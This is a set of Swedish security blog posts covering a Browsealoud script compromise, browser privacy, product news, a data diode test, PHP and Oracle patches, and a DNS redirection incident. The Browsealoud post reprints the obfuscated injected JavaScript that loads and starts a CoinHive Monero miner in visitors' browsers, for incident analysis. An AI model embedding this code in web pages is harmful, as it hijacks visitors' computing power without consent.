Säkerhetsbubblan nu över 3000 medlemmar

Facebookgruppen som jag och Karl Emil Nikka startade i November har nu nått 3000 medlemmar vilket är otroligt kul. Och vi tjänar inga pengar på gruppen utan den drivs helt ideellt av oss, precis som jag driver Kryptera.se.

Vi har några enkla regler samt så görs ett inlägg varje måndag med en sammanställning över vilka lediga jobb som finns ute just nu inom cybersäkerhet.

För att citera en av medlemmarna i gruppen:

Den mest givande kanalen just nu, och jag hakade på ganska direkt också. Jag tror att det här med högt och lågt, försöka dela med sig av kompletterande perspektiv och inte duka för att svara för de enkla frågorna är nycklar. Att faktiskt diskutera svenska förhållanden och sätta dem i sin kontext kan vara nog så viktigt inte bara i utbildning om säkerhet utan även i stadskunskap och ledningsfrågor som kan vara nog så viktiga för helheten.

Här hittar du gruppen: https://www.facebook.com/groups/sakerhetsbubblan/

Och undrar du varför gruppen har just ändelsen ”bubblan” så finns det en historia bakom. Här uppläst av Fredrik Wass:

https://soundcloud.com/bison/historien-om-hur-bubblan-blev

Javascript-miner installerad på hundratals populära svenska sajter

Uppdatering: En intressant iakttagelse jag har gjort är att sökfrågor på 1177.se skickas vidare till tredjeparter såsom Google och Browsealoud. Denna går att läsa ut via http referer headern eller window.location.href. Och ännu värre hade varit om en keylogger hade installerats i ba.js och då läst ut tips till polisen eller anonyma frågor till 1177.

För en stund sedan så modifierades en Amazon S3-lagringsplats som innehöll ett populärt javascript vid namn ba.js. Scriptet används för mjukvaran Browsealoud Web Screen Reader Software.

Följande skärmdump är från Reddit där en besökare till 1177.se som får en varning från sitt antivirus-program gällande CoinHive JS Miner:

Skärmdump av användaren ObjectiveDate på Reddit

Sökväg till scriptet som låg på Amazons CloudFront-tjänst d2pt7h3k9ifq48.cloudfront.net:

  • www.browsealoud.com/plus/scripts/ba.js

Och läser vi på om Coinhive så är det kryptovaluton Monero som det rör sig om (jag skrev tidigare felaktigt Bitcoin):

Coinhive offers a JavaScript miner for the Monero Blockchain (Why Monero?) that you can embed in your website

Och runt 4000 unika domäner länkar till detta script. Ett axplock av .se-domäner som länkar till scriptet som modifierats är följande:

  • lu.se
  • 1177.se
  • polisen.se
  • du.se
  • mah.se
  • malmo.se
  • hallakonsument.se
  • lund.se
  • skane.se
  • lansstyrelsen.se
  • mau.se
  • norrkoping.se
  • kungalv.se
  • botkyrka.se
  • informationsverige.se
  • finspang.se
  • moderaterna.se
  • linkoping.se
  • spsm.se
  • rsyd.se
  • karlstad.se
  • jonkoping.se
  • stockholmshem.se
  • abf.se
  • energimyndigheten.se
  • gotland.se
  • konsumentverket.se
  • humana.se
  • lfv.se
  • elsakerhetsverket.se
  • katrineholm.se
  • alingsas.se
  • haninge.se
  • arn.se
  • kulturradet.se
  • lanstrafikenkron.se
  • seom.se
  • xtrafik.se
  • fmv.se
  • vasamuseet.se
  • sigtuna.se
  • solleftea.se
  • sigtunahem.se
  • ljungby.se
  • do.se
  • alvdalen.se
  • ltkalmar.se
  • kalmar.se
  • jo.se
  • vannas.se
  • mjolby.se
  • folktandvardenskane.se
  • konsumenternas.se
  • musikverket.se
  • oskarshamn.se
  • moneyfromsweden.se
  • nordiskamuseet.se
  • autism.se
  • blekingetrafiken.se
  • knivsta.se
  • sbu.se

Och följande obfuskerade javascript-kod las till för att peka till CoinHive:

/* [Warning] Do not copy or self host this file, you will not be supported */ /* BrowseAloud Plus v2.5.0 (13-09-2017) */ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x27\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x63\x6f\x6d\x2f\x6c\x69\x62\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x6d\x69\x6e\x2e\x6a\x73\x3f\x72\x6e\x64\x3d"+window["\x4d\x61\x74\x68"]["\x72\x61\x6e\x64\x6f\x6d"]()+"\x27\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74\x3e \x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d \x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 \x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c \x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');

Tipstack till Linus Särud, Frans Rosén och Claes Magnusson.

Scriptet var modifierat mellan följande tidpunkter enligt Archive.org:

  • Sun, 11 Feb 2018 02:58:04 GMT
  • Sun, 11 Feb 2018 13:21:56 GMT

Ny integritetsfrämjande funktion i Mozilla

Mozilla inför från och med Firefox version 59 en intressant integritetsfrämjande åtgärd. Denna nya åtgärd begränsar den information som skickas till tredje-part via så kallade Referer-headers. Tidigare så skickades information såsom följande när du klickar på en länk som leder till en annan sajt:

Referer: https://www.reddit.com/r/privacy/comments/Preventing_data_leaks_by_stripping_path_information_in_HTTP_Referrers/

Vilket kan leda till känslig information kan läcka. Följande exempel är från healthcare.gov där information skickas vidare till ett antal leverantörer:

Även kan det förekomma sessions-information i URL:er. Men tittar vi på ovan information så har EFF rapporterat att följande URL läcker från healthcare.gov:

Referer: https://www.
healthcare.gov/see-plans/85601/results/?county=04019&age=40&smoker=1&pregnant=1&zip=85601&state=AZ&income=35000

Vilket kan vara typiskt obra. Men från Firefox version 59 så kommer enbart följande skickas vidare:

Referer: https://www.healthcare.gov/

Om du surfar i Private Browsing-mode. Sedan några år tillbaka finns även W3C standarden Referrer Policy där du som sajtadministratör själv kan välja hur Referer-headers ska fungera. Läs mer här:

Google startar cybersäkerhetsföretag: Chronicle

Nu startar Google upp ett nytt säkerhetsföretag vid namn Chronicle. Eller egentligen är det inte Google som startar upp företaget utan Googles moderbolag Alphabet. Chronicle är en avknoppning av Alphabets labbverksamhet som går under det mystiska namnet X.

Chronicle ska hjälpa till att stärka cybersäkerheten med bl.a. artificiell intelligens och smarta algoritmer. Även den populära tjänsten VirusTotal som Google köpte för några år sedan flyttas till Chronicle.

Stephen Gillett som är VD på Chronicle säger:

We want to 10x the speed and impact of security teams’ work by making it much easier, faster and more cost-effective for them to capture and analyze security signals that have previously been too difficult and expensive to find. We are building our intelligence and analytics platform to solve this problem.

Och en annan relaterad och intressant nyhet är att Amazon köper upp företaget Sqrrl som grundats av ett antal personer som tidigare jobbat på NSA. Sqrrl har byggt en intressant plattform för Threat Hunting.

Test av Advenica datadiod SecuriCDS DD1000A

Datadioder är relativt simpla tekniska lösningar för att överföra data mellan två separata nätverk. Dioden ser till att kommunikation enbart kan genomföras åt det ena hållet mellan nätverken.

Tidigare har jag testat datadioden AROW från brittiska företaget Somerdata som du kan läsa om här.

Men denna gång har fått låna en datadiod från svenska företaget Advenica som har en produktserie vid namn SecuriCDS (CDS står för Cross Domain Solutions). Den mindre datadioden jag har lånat går under namnet DD1000A. Denna diod har en storebror som heter DD1000i som har ett antal extra funktioner såsom proxy-inspektion.

För att förevisa hur en datadiod kan kopplas in så har jag tagit ett exempel från en presentation från FRA:

Denna datadiod som jag har testat har blivit godkänd av Försvarsmakten till komponentassuransnivå N3, vilket är den näst högsta nivån och enligt Försvarsmaktens militära underrättelse- och säkerhetstjänst, MUST defineras N3-nivån enligt följande:

”MUST kan godkänna produkter vars funktionalitet helt eller till huvudsak syfta till att uppfylla IT-säkerhetskrav till N3. Alternativt kan produkten vara så modulärt uppbyggd att säkerhetsfunktionaliteten enkelt kan avgränsas och evalueras i enskildhet. Komponentutvecklaren ska bistå granskningen med allt granskaren behöver, såsom dokumentation och tillgång till relevanta resurser, t.ex. personal och testmiljö. Komponentutvecklaren ska visa att allt arbete med produkten styrs av en utförlig säkerhetsprocess som omfattar hela produktens livscykel.”

När jag testar datadioden så stöter jag på två problem: Det första är att den enbart pratar gigabit-hastighet och måste således hitta en enhet som jag kan ansluta på insidan samt utsidan som stödjer detta.

Andra problemet jag stöter på är att den enbart skickar vidare data på Layer 2 (ethernet) nivå. Således måste allt som skickas via den först konverteras till ett protokoll för enkelriktad kommunikation såsom UDP. Som tur är så finns det minst en open-source mjukvara för detta, udp-sender (–async). För den med utvecklingskunskap eller budget kan man givetvis utveckla detta själv specifikt för den information man vill överföra.

Att enheten inte har någon inbyggd proxy-funktionalitet är givetvis bra för säkerheten och något som jag anser är bättre att bygga in i fristående komponenter och därmed bygga sin säkerhet modulärt.

Advenica berättar att ingen information i enheten kan gå i backriktningen och att det bygger på flera lager av säkerhet, bland annat en optisk fiber med endast sändare på ena sidan, och endast mottagare på den andra sidan.

Vilket kan förevisas lättast genom följande övergripande illustration:

Sammanfattning

Jobbar du på en organisation som anser att säkerhet är viktigt bör du ha en datadiod som separationsfunktion mellan olika segment i nätverket. Men att slentrianmässigt installera en diod tycker jag är felaktigt, utan bör föregås av en analys.

Det kanske är så att ni i dagsläget har ett fysiskt åtskilt nätverk, då kan en diod exempelvis användas för att skicka loggar till ett loggnätverk. Eller att ni har videoutrustning såsom kameror som står i utsatta positioner och behöver skicka in videoströmmar.

Jag har inte tittat på redundans och failover i denna utvärdering. Men rekommenderar att införskaffa två SecuriCDS DD1000A om du ska bygga en lösning som ska ha hög tillgänglighet.

Andra datadioder förutom Arow från Somerdata är Arbit Data diod, Fox it datadiode, Thales ELIPS-SD, Secunet SINA OneWay, DIY och QinetQ SyBard.

Framtiden inom nätverksforensik

nätverksforensik

Jag var intresserad av hur framtiden inom nätverksforensik ser ut nu när allt mer av vår vardagliga kommunikation på internet är krypterad. Så därför kontaktade jag Erik Hjelmvik som driver företaget Netresec samt utvecklar den populära mjukvaran Network Miner. Erik är en av Sveriges främsta specialister inom nätverksforensik och en av de som jag känner som troligtvis kan besvara frågan bäst.

Så här skriver Erik om framtiden gällande nätverksforensik och de utmaningar som området står inför:

Erik Hjelmvik”Användningen av HTTPS har ökat dramatiskt under de senaste fyra åren. En orsak till den ökade SSL-användningen är att man nu kan få gratis SSL-certifikat genom initiativ som t.ex. Let’s Encrypt, men jag tror även att Snowdens avslöjanden har gjort att intresset för krypterad  kommunikation har ökat märkbart. Den ökade användningen av SSL gör dock att det blir allt svårare att genomföra nätverksforensik eftersom innehållet i kommunikationen nu ofta är krypterad.

Som forensiker är det därför viktigt att ta vara på den information som går, även när trafiken är krypterad. Jag har exempelvis byggt in stöd i NetworkMiner för att extrahera X.509-certifikat från nätverkstrafik, vilket gör det lättare att hitta felaktiga och ogiltiga certifikat som används av botnät och annan skadlig kod för att kryptera sin kommunikation. Ett annat exempel på trafik som använder sig av ogiltiga certifikat är Tor, vilket använder sig av en SSL-handskakning för att sätta upp sin krypterade förbindelse.

Fingeravtryck i nätverkstrafik

En annan utmaning är att den tillgängliga bandbredden ökar, och därmed även datamängden som en forensiker behöver analysera. Utmaningen blir med andra ord en variant av att hitta nålen i höstacken, där höstacken utgörs av inspelad nätverkstrafik. Som forensiker kan man använda sig av exempelvis ”Rinse-Repeat Threat Hunting” för att minimera höstacken. Det kan också vara bra att ta ett steg tillbaka och börja analysen med att titta på flow-data, som vilka IP-adresser som pratar med vilka, innan man börjar analysera innehållet i trafiken.

För att kunna göra det effektivt krävs det dock att flow-vyn är berikad med information om exempelvis domännamn och WHOIS-information om IP-adresser, vilket jag tagit fasta på i verktyget CapLoader. Styrkan med CapLoader ligger dock framför allt i att kunna gå från flow-analys till att analysera trafiken på paketnivå med bara ett klick. De flesta flow-verktygen saknar dock denna förmåga, vilket gör att forensiker ofta tittar på antingen flow-data eller på paketdata istället för att kombinera båda teknikerna till ett mer effektivt arbetsflöde”

Ett flertal sårbarheter åtgärdade i PHP

En stor mängd säkerhetsbrister har åtgärdats i det populära webbramverket PHP. Sårbarheterna som uppdagats kan leda till att en angripare kan exekvera kod, genomföra blockeringsattacker (DoS) eller installera program(?). Oklart om dessa går att utnyttja fjärrmässigt, över internet exempelvis eller om det enbart är lokala sårbarheter.

Följande versioner är sårbara:

  • PHP 7.2 före version 7.2.1
  • PHP 7.1 före version 7.1.13
  • PHP 7.0 före version 7.0.27
  • PHP 5.0 före version 5.6.33

Följande sårbarheter är åtgärdade:

Version 7.2.1
Bug #64938 (libxml_disable_entity_loader setting is shared between requests).
Bug #73124 (php_ini_scanned_files() not reporting correctly).
Bug #73830 (Directory does not exist).
Bug #74183 (preg_last_error not returning error code after error).
Bug #74782 (remove file name from output to avoid XSS).
Bug #74862 (Unable to clone instance when private clone defined).
Bug #75074 (php-process crash when is_file() is used with strings longer 260 chars).
Bug #75384 (PHP seems incompatible with OneDrive files on demand).
Bug #75409 (accept EFAULT in addition to ENOSYS as indicator that getrandom() is missing).
Bug #75511 (fread not free unused buffer).
Bug #75514 (mt_rand returns value outside [$min,$max]+ on 32-bit) (Remi)
Bug #75525 (Access Violation in vcruntime140.dll).
Bug #75535 (Inappropriately parsing HTTP response leads to PHP segment fault).
Bug #75540 (Segfault with libzip 1.3.1).
Bug #75556 (Invalid opcode 138/1/1).
Bug #75570 (”Narrowing occurred during type inference” error).
Bug #75571 (Potential infinite loop in gdImageCreateFromGifCtx).
Bug #75573 (Segmentation fault in 7.1.12 and 7.0.26).
Bug #75574 (putenv does not work properly if parameter contains non-ASCII unicode character).
Bug #75579 (Interned strings buffer overflow may cause crash).
Bug #75608 (”Narrowing occurred during type inference” error).

Version 7.1.13
Bug #60471 (Random ”Invalid request (unexpected EOF)” using a router script).
Bug #64938 (libxml_disable_entity_loader setting is shared between requests).
Bug #73124 (php_ini_scanned_files() not reporting correctly).
Bug #73830 (Directory does not exist).
Bug #74183 (preg_last_error not returning error code after error).
Bug #74782 (remove file name from output to avoid XSS).
Bug #74862 (Unable to clone instance when private clone defined).
Bug #75074 (php-process crash when is_file() is used with strings longer 260 chars).
Bug #75384 (PHP seems incompatible with OneDrive files on demand).
Bug #75409 (accept EFAULT in addition to ENOSYS as indicator that getrandom() is missing).
Bug #75511 (fread not free unused buffer).
Bug #75514 (mt_rand returns value outside [$min,$max]+ on 32-bit) (Remi)
Bug #75535 (Inappropriately parsing HTTP response leads to PHP segment fault).
Bug #75540 (Segfault with libzip 1.3.1).
Bug #75570 (”Narrowing occurred during type inference” error).
Bug #75571 (Potential infinite loop in gdImageCreateFromGifCtx).
Bug #75573 (Segmentation fault in 7.1.12 and 7.0.26).
Bug #75574 (putenv does not work properly if parameter contains non-ASCII unicode character).
Bug #75579 (Interned strings buffer overflow may cause crash).
Bug #75608 (”Narrowing occurred during type inference” error).

Version 7.0.27
Bug #60471 (Random ”Invalid request (unexpected EOF)” using a router script).
Bug #64938 (libxml_disable_entity_loader setting is shared between requests).
Bug #74183 (preg_last_error not returning error code after error).
Bug #74782 (Reflected XSS in .phar 404 page).
Bug #75384 (PHP seems incompatible with OneDrive files on demand).
Bug #75409 (accept EFAULT in addition to ENOSYS as indicator that getrandom() is missing).
Bug #75535 (Inappropriately parsing HTTP response leads to PHP segment fault).
Bug #75540 (Segfault with libzip 1.3.1).
Bug #75571 (Potential infinite loop in gdImageCreateFromGifCtx).
Bug #75573 (Segmentation fault in 7.1.12 and 7.0.26).
Bug #75579 (Interned strings buffer overflow may cause crash).

Version 5.6.33
Bug #74782 (Reflected XSS in .phar 404 page).
Bug #75571 (Potential infinite loop in gdImageCreateFromGifCtx).

Källa: US-CERT

Oracle åtgärdar 237 sårbarheter

oracle säkerhetsbrister

Oracle har släppt sin January 2018 Oracle Critical Patch Update (CPU) som åtgärdar hela 237 sårbarheter. Några av de produkter där Oracle åtgärdar sårbarheter är följande:

  • MySQL
  • VirtualBox
  • WebCenter
  • HTTP Server
  • PeopleSoft
  • Solaris
  • Database Server
  • Java SE

Tittar vi närmare på exempelvis VirtualBox så ser vi en hel mängd CVE:er såsom CVE-2018-2694, CVE-2018-2698 osv. Dessa ska vara åtgärdade i version 5.2.6 men tyvärr så säger Changelog inget om detta, vilket är underligt. Även värt att nämna att PeopleSoft nyligen har haft problem med WebLogic genom att illasinnade personer nyttjat en tidigare sårbarhet för att köra krypto-miners, läs mer här.

CERT-SE vid Myndigheten för samhällsskydd och beredskap har även gått ut med en varning samt listat de sårbarheter som åtgärdas där de med högst CVSSv3 listas:

Database Server
CVE-2017-10282 Core RDBMS (CVSS 9.1 av 10.0)

Communications Applications
CVE-2017-5645, CVE-2015-3253 BRM – Elastic Charging Engine (CVSS 9.8 av 10.0)
CVE-2017-5645 Convergent Charging Controller (CVSS 9.8 av 10.0)
CVE-2017-5645 Network Charging and Control (CVSS 9.8 av 10.0)
CVE-2017-5645 Oracle Communications Services Gatekeeper (CVSS 9.8 av 10.0)

E-Business Suite
CVE-2018-2656 General Ledger (CVSS 9.1 av 10.0)
CVE-2018-2655 Oracle Work in Process (CVSS 9.1 av 10.0)

Oracle Fusion Middleware
CVE-2017-10352 WebLogic Server (CVSS 9.9 av 10)
CVE-2017-5461 Directory Server Enterprise Edition (CVSS 9.8 av 10)
CVE-2017-5461 iPlanet Web Server (CVSS 9.8 av 10)
CVE-2017-5645 Oracle WebLogic Server (CVSS 9.8 av 10)

Oracle Hospitality Applications
CVE-2018-2697 Hospitality Cruise Fleet Management (CVSS 9.1 av 10.0)

Detta är bara några av de rättade sårbarheterna. Besök Oracles webbsida [1] för att se vilka fler produkter som är sårbara.

Allvarligt fel hos NameSRS

Uppdatering 1: Det verkar som om domänpekningarna är legitima (och ingår i en kampanj via NameISP eller NameSRS) men att blocket.se råkade följa med i bara farten.

Uppdatering 2: NameISP har nu bekräftat via telefon att det var mänskliga faktorn som låg bakom och inget intrång.

Uppdatering 3: msb.se och krisinformation.se var ej påverkade av detta fel hos NameISP. Även värt att påpeka i sammanhanget är att registraren är Sveriges näst största.

Under natten så hackades eller så genomförde någon en stor miss hos domänregistraren NameSRS vilket fick till följd att cirka 11478 .se-domäner pekades om. Bland domänerna som pekades om fanns Blocket.se som under cirka 2h visade en helt annan webbsida:

Förutom att namnservarna var ändrade så ändrades också mailpekaren till följande mailserver:

  • mx224.m2bp.com (206.53.239.77, IQuest Internet)
  • mx224.mb1p.com (206.53.239.75, IQuest Internet)

Att mailpekare ändrades får till följd att det troligtvis varit möjligt för en obehörig att återställa lösenord för tredjepartstjänster samt ta del av E-post som skickats till domänerna.

Och tittar vi på whois-information gällande Blocket.se såg det ut enligt följande, observera namnservrarna:

Förutom Blocket.se så används NameSRS av bl.a. krisinformation.se samt msb.se, oklart huruvida dessa varit påverkade av just detta.

Försvarsberedningen: Sverige behöver en utvecklad förmåga inom cybersäkerhetsområdet

Försvarsberedningen släppte för några dagar sedan en inriktning av totalförsvaret och utformningen av det civila försvaret för åren 2021–2025.

Det jag finner extra intressant är kapitel 10 som handlar om informations- och cybersäkerhet. Och med följande citat från dokumentet sammanfattar bra en av många utmaningar inom cybersäkerhetsområdet:

Det blir allt svårare att säga var den civila infrastrukturen slutar och var den militära börjar.

Inriktingsrapporten tar även upp att cyberattacker är ett allvarligt hot mot befolkningens liv och hälsa, samhällets funktionalitet och vår förmåga att upprätthålla våra grundläggande värden. Och med det avses att allt mer av våra vardagliga liv blir beroende av att digitala funktioner i finansiella system, elnät, sjukvård och mycket annat.

Rapporten trycker även på att vi måste bli bättre beställare genom att kravställa på cybersäkerhet redan vid upphandling och inköp. Även framgår det att it-relaterade incidenter och avbrott i cyberdomänen måste systematiskt rapporteras och analyseras.

Om it-infrastrukturen komprometteras och vi saknar förberedda alternativa åtgärder riskerar tilliten till samhällets institutioner och våra totalförsvarsansträngningar att skadas.

Ingen ny rapport upprättas utan att nämna påverkanskampanjer och framförallt nu innan valet. Samt att cyberattacker kan utgöra en delmängd där även desinformation sprids, överbelastningsattacker utförs som hindrar tillgång till information.

Även så framgår det i rapporten gällande att med en aktiv cyberförmåga så kan Sverige agera proaktivt för att upptäcka eller få information om ett cyberintrång, olika former av cyberattacker, en hotande cyberoperation, eller för att fastställa en cyberoperations ursprung.

Förutom att kunna skydda sina egna system, innebär det att Försvarsmakten ska ansvara för totalförsvarets aktiva cyberförsvarsförmåga.

Och att denna cyberförsvarsförmåga ska byggas upp under en dialog med FRA och Säkerhetspolisen samt försvarsunderrättelsemyndigheterna.

Försvarsberedningen överlämnade sin rapport till försvarsminister Peter Hultqvist. Foto: Marcus Björkman/Regeringskansliet

Källa